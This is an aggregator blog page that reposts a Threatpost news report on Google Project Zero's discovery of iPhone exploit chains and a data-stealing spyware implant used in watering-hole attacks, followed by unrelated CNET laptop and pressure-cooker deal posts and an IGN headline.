-->

Friday, August 30, 2019

author photo

Technology - Google News


iPhone Zero-Days Anchored Watering-Hole Attacks - Threatpost

Posted: 30 Aug 2019 08:48 AM PDT

A new, highly capable spyware payload can monitor everything in a person's digital life.

A total of 14 iPhone vulnerabilities – including two that were zero-days when discovered — have been targeted by five exploit chains in a watering hole attack that has lasted years.

The watering holes deliver a spyware implant that can steal private data like iMessages, photos and GPS location in real time, according to Ian Beer with Google's Project Zero team.

"There was no target discrimination; simply visiting the hacked site was enough for the exploit server to attack your device, and if it was successful, install a monitoring implant," he wrote in a blog post on Friday. "We estimate that these sites receive thousands of visitors per week."

Beer said there were seven bugs for the iPhone's web browser, five for the kernel and two separate sandbox escapes used in the attack. Google was able to collect five separate, complete and unique iPhone exploit chains, covering almost every version from iOS 10 through to the latest version of iOS 12.

"Initial analysis indicated that at least one of the privilege escalation chains was still 0-day and unpatched at the time of discovery [in January] (CVE-2019-7287 & CVE-2019-7286)," he wrote.

He added that the scope of the versions targeted "indicated a group making a sustained effort to hack the users of iPhones in certain communities over a period of at least two years."

Google disclosed the issues to Apple in January, which resulted in the out-of-band release of iOS 12.1.4 in Feb 2019; the vulnerabilities were publicly disclosed at that point.

The malware payload used in the attack is a custom job, built for monitoring. It requests commands from a command and control server (C2) every 60 seconds, and is primarily focused on stealing files and uploading live location data. Beer's analysis showed that it can be used to get around some of the protections that dissidents for example use to protect their privacy (and in many cases physical safety).

According to Beer, the attackers used the exploit chains to gain unsandboxed code execution as root on iPhones. From there, the attackers called "posix_spawn," passing the path to their implant binary which they dropped in /tmp, which starts the implant running in the background as root.

"The implant runs completely in userspace, albeit unsandboxed and as root with entitlements chosen by the attacker to ensure they can still access all the private data they are interested in," the researcher detailed. "Using jtool, we can view the entitlements the implant has…the attackers have complete control over these as they used the kernel exploit to add the hash of the implant binary's code signature to the kernel trust cache."

In his testing, Beer was able to use the malware to steal database files on an infected phone used by encrypted messaging apps like Whatsapp, Telegram and iMessage – meaning he could lift the unencrypted, plain-text of the messages sent and received.

That same technique could be used across the device.

"The implant can upload private files used by all apps on the device; [such as] the plaintext contents of emails sent via Gmail, which are uploaded to the attacker's server," Beer said.

The implant also takes copies of the user's complete contacts database, including full names and numbers stored in the iPhone contacts, copies photos, and can upload the user's location in real time, up to once per minute, if the device is online.

Then there's the keychain, which the iPhone uses to store credentials and certificates, such as the SSIDs and passwords for all saved Wi-Fi access points.

"The keychain also contains the long-lived tokens used by services such as Google's iOS Single-Sign-On to enable Google apps to access the user's account," Beer said. "These will be uploaded to the attackers and can then be used to maintain access to the user's Google account, even once the implant is no longer running."

The IP address of the server to upload content to is hardcoded in the implant binary.

"This function uses that address to make an HTTP POST request, passing the contents of the files provided in the files argument as a multipart/form-data payload (with the hardcoded boundary string "9ff7172192b7″ delimiting the fields in the body data)," Beer explained.

Also concerning is the fact that nothing is encrypted – everything is sent to the C2 via HTTP (not HTTPS), opening up the potential for the data to leak to others.

"If you're connected to an unencrypted Wi-Fi network this information is being broadcast to everyone around you, to your network operator and any intermediate network hops to the command-and-control server," Beer said. "This means that not only is the endpoint of the end-to-end encryption offered by messaging apps compromised; the attackers then send all the contents of the end-to-end encrypted messages in plain text over the network to their server."

The malware is not persistent and is cleared if the iPhone is rebooted. However, "given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device," Beer said.

For users, they wouldn't know they've been infected, allowing the binary to keep tabs on them for as long as the user goes without rebooting.

"There is no visual indicator on the device that the implant is running. There's no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system," according to the researcher.

He said that the watering holes (no details on them were given) are clearly targeting certain cohorts of people. Though he didn't explicitly say if they were political or demographic groups, Beer intimated the former.

"I hope to guide the general discussion around exploitation away from a focus on the million dollar dissident and towards discussion of the marginal cost for monitoring the n+1'th potential future dissident," he said. "I shan't get into a discussion of whether these exploits cost $1 million, $2 million, or $20 million. I will instead suggest that all of those price tags seem low for the capability to target and monitor the private activities of entire populations in real time."

He also said that the watering holes, zero-days and exploits that Google discovered are likely the tip of the iceberg: "For this one campaign that we've seen, there are almost certainly others that are yet to be seen."

Interested in more on the internet of things (IoT)? Don't miss our on-demand Threatpost webinar, IoT: Implementing Security in a 5G World. Join Threatpost senior editor Tara Seals and a panel of experts as they offer enterprises and other organizations insight about how to approach security for the next wave of IoT deployments, which will be enabled by the rollout of 5G networks worldwide. Click here to listen to the recorded webinar.

 

 

Let's block ads! (Why?)

Dell XPS 13 deal: Save $600 on one of our favorite laptops - CNET

Posted: 30 Aug 2019 06:30 AM PDT

dell-xps-13-17

Get a high-end Dell XPS 13 configuration for very near the price of the entry-level model.

Sarah Tew/CNET

Back in March, Dell introduced a new version of its already-very-good XPS 13 laptop. Dan Ackerman's verdict: "We've finally run out of complaints." The near-perfect system easily won a spot on CNET's list of the best laptops for 2019. Of course, it's not an inexpensive machine, especially when you start piling on high-end features like a blazing fast processor, big solid-state drive and ultra-HD touch display. 

That's what makes today's deal so exciting. For a limited time, and while supplies last, the Dell XPS 13 is $979.99 when you apply coupon code DBLTXPS133 at checkout. That's $620 (!) off the regular price, though the promotion says "save $600," so I'm not sure what accounts for the extra $20. Note that CNET may get a share of revenue from the sale of the products featured on this page.

But, wait, it can get even better: Rakuten (formerly Ebates) is offering 8% cash back on Dell purchases, which would bring your net total (not including sales tax) down to just over $900. My advice: Use the Rakuten browser plug-in to greatly simplify taking advantage of cash-back offers like this.

This particular XPS 13 configuration is pretty decked-out: Intel Core i7 processor, 256GB SSD and a 13.3-inch 4K Ultra HD 3,840x2,160-pixel InfinityEdge touch display. If there's a weak spot, it's the RAM: just 8GB. It's sufficient, but 16GB would be preferable in a system like this.

For more info, I'll turn you over to Ackerman's aforementioned Dell XPS 13 review. Beyond that, I'll just note that Dell often has very limited quantities available for these kinds of deals, so while it's in stock as of this writing, it may not be for much longer. If you've been eyeballing this machine, act fast.

Your thoughts?

Bonus deal: Ninja's 6-quart pressure cooker is on sale for just $50

Instant Pot is far from the only pressure-cooker game in town. There are plenty of other models that are just as good -- and when they're on sale, they're arguably even better.

For a limited time, and while supplies last, Best Buy has the Ninja PC101 6-quart pressure cooker for $49.99. Regular price: $99.99.

Also able to steam, saute and slow-cook, the Ninja lacks a few of the fancier options (like yogurt-making) found in higher-end cookers, but definitely handles all the basics. It has a fully removable lid, a steam rack and an extra o-ring.

Particularly telling: Nearly 200 buyers collectively rated this 4.8 stars out of 5. If you don't already have a pressure cooker, you should -- but you shouldn't pay upward of $100 for one.

Now playing: Watch this: A few simple tweaks make the Dell XPS 13 a near-perfect...

4:40


CNET's Cheapskate scours the web for great deals on tech products and much more. For the latest deals and updates, follow the Cheapskate on Facebook and Twitter. Questions about the Cheapskate blog? Find the answers on our FAQ page, and find more great buys on the CNET Deals page.

Let's block ads! (Why?)

Man Of Medan: 13 Character Death Scenes - IGN

Posted: 30 Aug 2019 02:00 AM PDT

This post have 0 komentar


EmoticonEmoticon

Next article Next Post
Previous article Previous Post